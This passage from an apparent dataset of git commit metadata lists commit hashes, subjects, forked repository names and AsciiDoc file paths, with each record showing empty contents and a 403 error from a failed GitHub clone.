nallimaye\/elasticsearch,yuy168\/elasticsearch,nknize\/elasticsearch,himanshuag\/elasticsearch,yongminxia\/elasticsearch,himanshuag\/elasticsearch,wittyameta\/elasticsearch,sarwarbhuiyan\/elasticsearch,acchen97\/elasticsearch,achow\/elasticsearch,liweinan0423\/elasticsearch,szroland\/elasticsearch,infusionsoft\/elasticsearch,jimhooker2002\/elasticsearch,mbrukman\/elasticsearch,geidies\/elasticsearch,phani546\/elasticsearch,umeshdangat\/elasticsearch,Fsero\/elasticsearch,mmaracic\/elasticsearch,ESamir\/elasticsearch,tahaemin\/elasticsearch,schonfeld\/elasticsearch,Fsero\/elasticsearch,Collaborne\/elasticsearch,yongminxia\/elasticsearch,gfyoung\/elasticsearch,loconsolutions\/elasticsearch,trangvh\/elasticsearch,yongminxia\/elasticsearch,jimczi\/elasticsearch,wittyameta\/elasticsearch,nilabhsagar\/elasticsearch,fforbeck\/elasticsearch,lzo\/elasticsearch-1,onegambler\/elasticsearch,Kakakakakku\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,bestwpw\/elasticsearch,zkidkid\/elasticsearch,qwerty4030\/elasticsearch,liweinan0423\/elasticsearch,Uiho\/elasticsearch,kubum\/elasticsearch,Siddartha07\/elasticsearch,jsgao0\/elasticsearch,strapdata\/elassandra5-rc,hydro2k\/elasticsearch,cnfire\/elasticsearch-1,JervyShi\/elasticsearch,Brijeshrpatel9\/elasticsearch,koxa29\/elasticsearch,szroland\/elasticsearch,smflorentino\/elasticsearch,tkssharma\/elasticsearch,PhaedrusTheGreek\/elasticsearch,himanshuag\/elasticsearch,rlugojr\/elasticsearch,henakamaMSFT\/elasticsearch,Collaborne\/elasticsearch,dataduke\/elasticsearch,StefanGor\/elasticsearch,chirilo\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,uschindler\/elasticsearch,acchen97\/elasticsearch,wenpos\/elasticsearch,mcku\/elasticsearch,andrejserafim\/elasticsearch,socialrank\/elasticsearch,dylan8902\/elasticsearch,kimimj\/elasticsearch,franklanganke\/elasticsearch,infusionsoft\/elasticsearch,sposam\/elasticsearch,zeroctu\/elasticsearch,hafkensite\/elasticsearch,fred84\/elasticsearch,episerver\/elasticsearch,hydro2k\/elasticsearch,jeteve\/elasticsearch,rhoml\/elasticsearch,achow\/elasticsearch,milodky\/elasticsearch,PhaedrusTheGreek\/elasticsearch,scottsom\/elasticsearch,loconsolutions\/elasticsearch,golubev\/elasticsearch,xpandan\/elasticsearch,Ansh90\/elasticsearch,Widen\/elasticsearch,MetSystem\/elasticsearch,LeoYao\/elasticsearch,truemped\/elasticsearch,iantruslove\/elasticsearch,tahaemin\/elasticsearch,Helen-Zhao\/elasticsearch,phani546\/elasticsearch,Liziyao\/elasticsearch,gingerwizard\/elasticsearch,lks21c\/elasticsearch,njlawton\/elasticsearch,dpursehouse\/elasticsearch,humandb\/elasticsearch,yanjunh\/elasticsearch,mbrukman\/elasticsearch,areek\/elasticsearch,geidies\/elasticsearch,AndreKR\/elasticsearch,elancom\/elasticsearch,rhoml\/elasticsearch,kalimatas\/elasticsearch,MisterAndersen\/elasticsearch,Kakakakakku\/elasticsearch,rmuir\/elasticsearch,ydsakyclguozi\/elasticsearch,bestwpw\/elasticsearch,ulkas\/elasticsearch,girirajsharma\/elasticsearch,henakamaMSFT\/elasticsearch,vingupta3\/elasticsearch,vvcephei\/elasticsearch,rmuir\/elasticsearch,dylan8902\/elasticsearch,ESamir\/elasticsearch,huanzhong\/elasticsearch,nknize\/elasticsearch,girirajsharma\/elasticsearch,yongminxia\/elasticsearch,franklanganke\/elasticsearch,slavau\/elasticsearch,naveenhooda2000\/elasticsearch,KimTaehee\/elasticsearch,golubev\/elasticsearch,markharwood\/elasticsearch,Stacey-Gammon\/elasticsearch,nilabhsagar\/elasticsearch,jchampion\/elasticsearch,NBSW\/elasticsearch,maddin2016\/elasticsearch,mapr\/elasticsearch,pritishppai\/elasticsearch,ouyangkongtong\/elasticsearch,F0lha\/elasticsearch,kalburgimanjunath\/elasticsearch,beiske\/elasticsearch,jango2015\/elasticsearch,masaruh\/elasticsearch,maddin2016\/elasticsearch,kenshin233\/elasticsearch,vingupta3\/elasticsearch,andrejserafim\/elasticsearch,sauravmondallive\/elasticsearch,xpandan\/elasticsearch,javachengwc\/elasticsearch,Chhunlong\/elasticsearch,mm0\/elasticsearch,pablocastro\/elasticsearch,alexbrasetvik\/elasticsearch,djschny\/elasticsearch,HonzaKral\/elasticsearch,slavau\/elasticsearch,GlenRSmith\/elasticsearch,xingguang2013\/elasticsearch","old_file":"docs\/reference\/modules\/snapshots.asciidoc","new_file":"docs\/reference\/modules\/snapshots.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0165dbbc8436526da63393d5ae5cdc1fd6ad8da","subject":"y2b create post Henge Docks Clique Unboxing \\u0026 Overview","message":"y2b create post Henge Docks Clique Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-01-Henge-Docks-Clique-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2012-03-01-Henge-Docks-Clique-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88b9ffc19e3debca22a03e547a3b9d071eeeb732","subject":"Update 2020-06-24-how-to-use-accounts-ui-with-elm-and-meteor.adoc","message":"Update 2020-06-24-how-to-use-accounts-ui-with-elm-and-meteor.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-06-24-how-to-use-accounts-ui-with-elm-and-meteor.adoc","new_file":"_posts\/2020-06-24-how-to-use-accounts-ui-with-elm-and-meteor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21914ec154b60c479a5e8673c6bbe73af3b6c564","subject":"Fix STS link in CONTRIBUTING.adoc","message":"Fix STS link in CONTRIBUTING.adoc\n\nCloses gh-5796\n","repos":"dreis2211\/spring-boot,donhuvy\/spring-boot,lucassaldanha\/spring-boot,chrylis\/spring-boot,mbenson\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,michael-simons\/spring-boot,vpavic\/spring-boot,brettwooldridge\/spring-boot,RichardCSantana\/spring-boot,bjornlindstrom\/spring-boot,tsachev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jbovet\/spring-boot,ollie314\/spring-boot,xiaoleiPENG\/my-project,vpavic\/spring-boot,NetoDevel\/spring-boot,candrews\/spring-boot,i007422\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,zhanhb\/spring-boot,habuma\/spring-boot,pvorb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,yhj630520\/spring-boot,wilkinsona\/spring-boot,qerub\/spring-boot,isopov\/spring-boot,mbenson\/spring-boot,minmay\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot-concourse,dreis2211\/spring-boot,Nowheresly\/spring-boot,vakninr\/spring-boot,ollie314\/spring-boot,herau\/spring-boot,joshthornhill\/spring-boot,donhuvy\/spring-boot,michael-simons\/spring-boot,sebastiankirsch\/spring-boot,hello2009chen\/spring-boot,joshiste\/spring-boot,tsachev\/spring-boot,bclozel\/spring-boot,DeezCashews\/spring-boot,thomasdarimont\/spring-boot,jbovet\/spring-boot,NetoDevel\/spring-boot,kdvolder\/spring-boot,Buzzardo\/spring-boot,RichardCSantana\/spring-boot,vpavic\/spring-boot,dreis2211\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,htynkn\/spring-boot,zhanhb\/spring-boot,brettwooldridge\/spring-boot,nebhale\/spring-boot,michael-simons\/spring-boot,jvz\/spring-boot,deki\/spring-boot,wilkinsona\/spring-boot,herau\/spring-boot,bclozel\/spring-boot,xiaoleiPENG\/my-project,chrylis\/spring-boot,aahlenst\/spring-boot,minmay\/spring-boot,tiarebalbi\/spring-boot,ollie314\/spring-boot,spring-projects\/spring-boot,bbrouwer\/spring-boot,lburgazzoli\/spring-boot,felipeg48\/spring-boot,qerub\/spring-boot,philwebb\/spring-boot-concourse,yangdd1205\/spring-boot,ilayaperumalg\/spring-boot,deki\/spring-boot,hello2009chen\/spring-boot,hqrt\/jenkins2-course-spring-boot,mbogoevici\/spring-boot,habuma\/spring-boot,spring-projects\/spring-boot,bijukunjummen\/spring-boot,pvorb\/spring-boot,javyzheng\/spring-boot,ptahchiev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tsachev\/spring-boot,i007422\/jenkins2-course-spring-boot,lexandro\/spring-boot,spring-projects\/spring-boot,vakninr\/spring-boot,eddumelendez\/spring-boot,philwebb\/spring-boot,royclarkson\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,royclarkson\/spring-boot,aahlenst\/spring-boot,thomasdarimont\/spring-boot,mbogoevici\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,SaravananParthasarathy\/SPSDemo,drumonii\/spring-boot,olivergierke\/spring-boot,RichardCSantana\/spring-boot,htynkn\/spring-boot,eddumelendez\/spring-boot,mdeinum\/spring-boot,jbovet\/spring-boot,bjornlindstrom\/spring-boot,jvz\/spring-boot,drumonii\/spring-boot,shangyi0102\/spring-boot,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,deki\/spring-boot,SaravananParthasarathy\/SPSDemo,hqrt\/jenkins2-course-spring-boot,shakuzen\/spring-boot,sebastiankirsch\/spring-boot,hqrt\/jenkins2-course-spring-boot,sbcoba\/spring-boot,minmay\/spring-boot,thomasdarimont\/spring-boot,minmay\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,yangdd1205\/spring-boot,candrews\/spring-boot,philwebb\/spring-boot-concourse,isopov\/spring-boot,jbovet\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,shangyi0102\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,michael-simons\/spring-boot,qerub\/spring-boot,donhuvy\/spring-boot,dreis2211\/spring-boot,wilkinsona\/spring-boot,lucassaldanha\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,bijukunjummen\/spring-boot,bijukunjummen\/spring-boot,ihoneymon\/spring-boot,sebastiankirsch\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,kdvolder\/spring-boot,akmaharshi\/jenkins,eddumelendez\/spring-boot,linead\/spring-boot,ilayaperumalg\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,mdeinum\/spring-boot,scottfrederick\/spring-boot,habuma\/spring-boot,felipeg48\/spring-boot,shakuzen\/spring-boot,Nowheresly\/spring-boot,olivergierke\/spring-boot,deki\/spring-boot,lucassaldanha\/spring-boot,bclozel\/spring-boot,Nowheresly\/spring-boot,aahlenst\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,javyzheng\/spring-boot,joshthornhill\/spring-boot,rweisleder\/spring-boot,bijukunjummen\/spring-boot,DeezCashews\/spring-boot,hello2009chen\/spring-boot,drumonii\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,donhuvy\/spring-boot,mdeinum\/spring-boot,bjornlindstrom\/spring-boot,pvorb\/spring-boot,wilkinsona\/spring-boot,olivergierke\/spring-boot,NetoDevel\/spring-boot,mdeinum\/spring-boot,mosoft521\/spring-boot,ptahchiev\/spring-boot,ptahchiev\/spring-boot,kamilszymanski\/spring-boot,akmaharshi\/jenkins,sbcoba\/spring-boot,vakninr\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,nebhale\/spring-boot,herau\/spring-boot,mbogoevici\/spring-boot,jxblum\/spring-boot,lexandro\/spring-boot,kdvolder\/spring-boot,bbrouwer\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,sebastiankirsch\/spring-boot,linead\/spring-boot,akmaharshi\/jenkins,lexandro\/spring-boot,rweisleder\/spring-boot,candrews\/spring-boot,ptahchiev\/spring-boot,i007422\/jenkins2-course-spring-boot,zhanhb\/spring-boot,royclarkson\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,xiaoleiPENG\/my-project,bbrouwer\/spring-boot,bbrouwer\/spring-boot,deki\/spring-boot,chrylis\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,shangyi0102\/spring-boot,joshthornhill\/spring-boot,drumonii\/spring-boot,DeezCashews\/spring-boot,ollie314\/spring-boot,qerub\/spring-boot,mosoft521\/spring-boot,isopov\/spring-boot,lexandro\/spring-boot,vakninr\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,jxblum\/spring-boot,javyzheng\/spring-boot,akmaharshi\/jenkins,drumonii\/spring-boot,philwebb\/spring-boot,DeezCashews\/spring-boot,vpavic\/spring-boot,mbenson\/spring-boot,hello2009chen\/spring-boot,joshthornhill\/spring-boot,shakuzen\/spring-boot,mbenson\/spring-boot,brettwooldridge\/spring-boot,ptahchiev\/spring-boot,linead\/spring-boot,tiarebalbi\/spring-boot,shakuzen\/spring-boot,NetoDevel\/spring-boot,lucassaldanha\/spring-boot,habuma\/spring-boot,nebhale\/spring-boot,chrylis\/spring-boot,bjornlindstrom\/spring-boot,jxblum\/spring-boot,jxblum\/spring-boot,mosoft521\/spring-boot,wilkinsona\/spring-boot,wilkinsona\/spring-boot,mbogoevici\/spring-boot,yangdd1205\/spring-boot,drumonii\/spring-boot,felipeg48\/spring-boot,eddumelendez\/spring-boot,bijukunjummen\/spring-boot,eddumelendez\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,yhj630520\/spring-boot,kamilszymanski\/spring-boot,jayarampradhan\/spring-boot,lburgazzoli\/spring-boot,DeezCashews\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,afroje-reshma\/spring-boot-sample,jbovet\/spring-boot,hello2009chen\/spring-boot,ilayaperumalg\/spring-boot,mosoft521\/spring-boot,qerub\/spring-boot,habuma\/spring-boot,scottfrederick\/spring-boot,sbcoba\/spring-boot,mbogoevici\/spring-boot,brettwooldridge\/spring-boot,ihoneymon\/spring-boot,kdvolder\/spring-boot,bclozel\/spring-boot,brettwooldridge\/spring-boot,kdvolder\/spring-boot,isopov\/spring-boot,candrews\/spring-boot,aahlenst\/spring-boot,shakuzen\/spring-boot,mosoft521\/spring-boot,felipeg48\/spring-boot,sbcoba\/spring-boot,nebhale\/spring-boot,thomasdarimont\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,Buzzardo\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,joshiste\/spring-boot,shangyi0102\/spring-boot,NetoDevel\/spring-boot,joshiste\/spring-boot,spring-projects\/spring-boot,mbenson\/spring-boot,chrylis\/spring-boot,philwebb\/spring-boot,javyzheng\/spring-boot,philwebb\/spring-boot,lexandro\/spring-boot,jayarampradhan\/spring-boot,scottfrederick\/spring-boot,olivergierke\/spring-boot,jvz\/spring-boot,ilayaperumalg\/spring-boot,jxblum\/spring-boot,spring-projects\/spring-boot,olivergierke\/spring-boot,isopov\/spring-boot,bbrouwer\/spring-boot,SaravananParthasarathy\/SPSDemo,felipeg48\/spring-boot,xiaoleiPENG\/my-project,ilayaperumalg\/spring-boot,rweisleder\/spring-boot,lburgazzoli\/spring-boot,nebhale\/spring-boot,jxblum\/spring-boot,sebastiankirsch\/spring-boot,afroje-reshma\/spring-boot-sample,aahlenst\/spring-boot,dreis2211\/spring-boot,mbenson\/spring-boot,scottfrederick\/spring-boot,ihoneymon\/spring-boot,pvorb\/spring-boot,shakuzen\/spring-boot,afroje-reshma\/spring-boot-sample,tsachev\/spring-boot,minmay\/spring-boot,bclozel\/spring-boot,jvz\/spring-boot,sbcoba\/spring-boot,yhj630520\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,candrews\/spring-boot,SaravananParthasarathy\/SPSDemo,yhj630520\/spring-boot,thomasdarimont\/spring-boot,isopov\/spring-boot,philwebb\/spring-boot-concourse,RichardCSantana\/spring-boot,habuma\/spring-boot,linead\/spring-boot,ihoneymon\/spring-boot,philwebb\/spring-boot,afroje-reshma\/spring-boot-sample,afroje-reshma\/spring-boot-sample,ihoneymon\/spring-boot,donhuvy\/spring-boot,jvz\/spring-boot,i007422\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,herau\/spring-boot,tiarebalbi\/spring-boot,jayarampradhan\/spring-boot,joshiste\/spring-boot,akmaharshi\/jenkins,Nowheresly\/spring-boot,xiaoleiPENG\/my-project,kamilszymanski\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,htynkn\/spring-boot,michael-simons\/spring-boot,SaravananParthasarathy\/SPSDemo,joshthornhill\/spring-boot,tsachev\/spring-boot,vpavic\/spring-boot,yhj630520\/spring-boot,philwebb\/spring-boot-concourse,zhanhb\/spring-boot,zhanhb\/spring-boot,tiarebalbi\/spring-boot,ptahchiev\/spring-boot,eddumelendez\/spring-boot,rweisleder\/spring-boot,hqrt\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,kamilszymanski\/spring-boot,shangyi0102\/spring-boot,bclozel\/spring-boot,spring-projects\/spring-boot,zhanhb\/spring-boot,kdvolder\/spring-boot,RichardCSantana\/spring-boot,linead\/spring-boot,javyzheng\/spring-boot,Buzzardo\/spring-boot,donhuvy\/spring-boot","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91c6fd3a0a6a3f31c141582b4bdc369690d4d6c2","subject":"Update 2015-07-27-TrainingMenuAugust.adoc","message":"Update 2015-07-27-TrainingMenuAugust.adoc","repos":"diodario\/hubpress.io,diodario\/hubpress.io,diodario\/hubpress.io","old_file":"_posts\/2015-07-27-TrainingMenuAugust.adoc","new_file":"_posts\/2015-07-27-TrainingMenuAugust.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diodario\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b45e7cded5bcd340dbf7d3ba948382860be0fe6","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8d57eb97e50b62bd5fe49b4899a840bd9fa7451","subject":"y2b create post SMS Audio - STREET by 50 Headphones Unboxing","message":"y2b create post SMS Audio - STREET by 50 Headphones Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-23-SMS-Audio--STREET-by-50-Headphones-Unboxing.adoc","new_file":"_posts\/2012-04-23-SMS-Audio--STREET-by-50-Headphones-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2dcbd5a62b053b5f50116a05c23557907b406a75","subject":"Update 2016-03-31-Descuidos-fatales.adoc","message":"Update 2016-03-31-Descuidos-fatales.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0655a86a58f3ca22a18fdb81d96c048587927d28","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f50d2ff5dbb89e0173947d4b13c53b5b6f9cbc8c","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45f39cbded6b4fcbe266cefa48450971b844aa1b","subject":"Update 2019-05-28-What-the-fuck-man.adoc","message":"Update 2019-05-28-What-the-fuck-man.adoc","repos":"dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io,dgrizzla\/dgrizzla.github.io","old_file":"_posts\/2019-05-28-What-the-fuck-man.adoc","new_file":"_posts\/2019-05-28-What-the-fuck-man.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dgrizzla\/dgrizzla.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fa5a6ddfaac366ae146f73a58dd9b8e63398bd3","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Search path\/README.adoc","new_file":"Search path\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4c29926970cb05de4f3efde569c6392ae77bb4e","subject":"Update 2015-02-10-R-K.adoc","message":"Update 2015-02-10-R-K.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-02-10-R-K.adoc","new_file":"_posts\/2015-02-10-R-K.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd01c951c079d1cc18820db83538c5105fb49399","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9c21af02cd370451ea6d6a7a3f9b7cd5f2b7b4c","subject":"Update 2017-12-18-Moving-the-blog-to-Github-pages.adoc","message":"Update 2017-12-18-Moving-the-blog-to-Github-pages.adoc","repos":"flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io,flipswitchingmonkey\/flipswitchingmonkey.github.io","old_file":"_posts\/2017-12-18-Moving-the-blog-to-Github-pages.adoc","new_file":"_posts\/2017-12-18-Moving-the-blog-to-Github-pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flipswitchingmonkey\/flipswitchingmonkey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f024ee7ac2d78c9e824b1ba50499910a2efb87f0","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"795439e957f76f944042aa0ab0586fe934f0c4a8","subject":"y2b create post The World's Most Dangerous iPhone Case","message":"y2b create post The World's Most Dangerous iPhone Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-28-TheWorldsMostDangerousiPhoneCase.adoc","new_file":"_posts\/2017-12-28-TheWorldsMostDangerousiPhoneCase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33792aee83caea646111c0c835c26c5cc4a5e4e0","subject":"Update 2016-06-03-My-journey-to-face-The-Lambda-expressions-in-Java.adoc","message":"Update 2016-06-03-My-journey-to-face-The-Lambda-expressions-in-Java.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-06-03-My-journey-to-face-The-Lambda-expressions-in-Java.adoc","new_file":"_posts\/2016-06-03-My-journey-to-face-The-Lambda-expressions-in-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32dfa60dbd5360c561d49c9cd9b458d0bc6a413c","subject":"Update 2016-08-12-Components-hacked-into-Struts2-java-web-framework.adoc","message":"Update 2016-08-12-Components-hacked-into-Struts2-java-web-framework.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-08-12-Components-hacked-into-Struts2-java-web-framework.adoc","new_file":"_posts\/2016-08-12-Components-hacked-into-Struts2-java-web-framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68252b154dac6c5853548ff359e016309a186d08","subject":"Update 2017-01-18-Ambiente-de-Desenvolvimento-Rails-Vagrant-Ansible.adoc","message":"Update 2017-01-18-Ambiente-de-Desenvolvimento-Rails-Vagrant-Ansible.adoc","repos":"emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io,emilio2hd\/emilio2hd.github.io","old_file":"_posts\/2017-01-18-Ambiente-de-Desenvolvimento-Rails-Vagrant-Ansible.adoc","new_file":"_posts\/2017-01-18-Ambiente-de-Desenvolvimento-Rails-Vagrant-Ansible.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emilio2hd\/emilio2hd.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d12510ed22c8550b1d9e861fd8c0931d6d8c486a","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8e416a0cda3f6b6e398da9138f496c4f67023bf","subject":"Added document about WTP","message":"Added document about WTP\n\nQuick references to WTP \n\nChange-Id: 